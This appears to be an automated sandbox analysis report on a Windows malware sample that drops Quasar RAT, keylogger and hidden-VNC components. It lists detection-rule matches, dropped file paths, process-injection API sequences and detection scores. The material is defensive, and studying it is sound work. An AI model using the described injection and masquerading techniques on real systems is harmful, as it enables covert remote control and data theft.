Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: dropped/windef.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: dropped/windef.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C7B11C GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,GetLastError,CloseHandle,GetKeyState,ExitWindowsEx,

Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: String function: 00A68900 appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00DD37CB appears 38 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00DD8900 appears 49 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00DE1940 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 004034E4 appears 33 times

Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB318A NtWow64QueryInformationProcess64,GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB2591 NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB27FB NtUnmapViewOfSection,RtlNtStatusToDosError,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB27C1 NtMapViewOfSection,RtlNtStatusToDosError,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB31D4 NtWow64ReadVirtualMemory64,GetModuleHandleW,GetProcAddress,NtWow64ReadVirtualMemory64,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB3509 GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,LocalFree,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB2ED8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB2B39 memset,ZwQueryInformationProcess,ReadProcessMemory,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB126D NtQueryVirtualMemory,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C64CC8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C64854 memset,ZwQueryInformationProcess,ReadProcessMemory,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C63450 memset,NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6502C ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,StrRChrA,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C82AC8 GetSystemTimes,NtQuerySystemInformation,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C636F8 NtUnmapViewOfSection,RtlNtStatusToDosError,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6528C NtResumeProcess,RtlNtStatusToDosError,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C652A4 NtSuspendProcess,RtlNtStatusToDosError,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C636A8 NtMapViewOfSection,RtlNtStatusToDosError,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C82E70 InitializeCriticalSection,GetModuleHandleW,GetProcAddress,GetSystemTimes,NtQuerySystemInformation,HeapAlloc,GetTickCount,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C64634 memset,ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C83FCC ZwQueryKey,ZwQueryKey,memcpy,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C803EC GetProcessId,lstrlenW,HeapAlloc,HeapFree,HeapAlloc,NtQuerySystemInformation,GetCurrentProcess,DuplicateHandle,NtQueryObject,HeapFree,HeapAlloc,HeapFree,HeapAlloc,NtQueryObject,RtlInitUnicodeString,RtlEqualUnicodeString,NtQueryInformationFile,NtQueryInformationFile,_wcsnicmp,HeapAlloc,CloseHandle,HeapFree,HeapFree,HeapFree,

Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: CVbJSUXraQ.exe, 00000001.00000003.691617419.0000000001805000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamej vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe

Source: CVbJSUXraQ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File created: C:\Users\user\btpanui

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@33/5@3/3

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: winsock.exe.6.dr, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: winsock.exe.6.dr, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E1A06A GetLastError,FormatMessageW,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

Source: CVbJSUXraQ.exe	Virustotal: Detection: 73%
Source: CVbJSUXraQ.exe	Metadefender: Detection: 68%
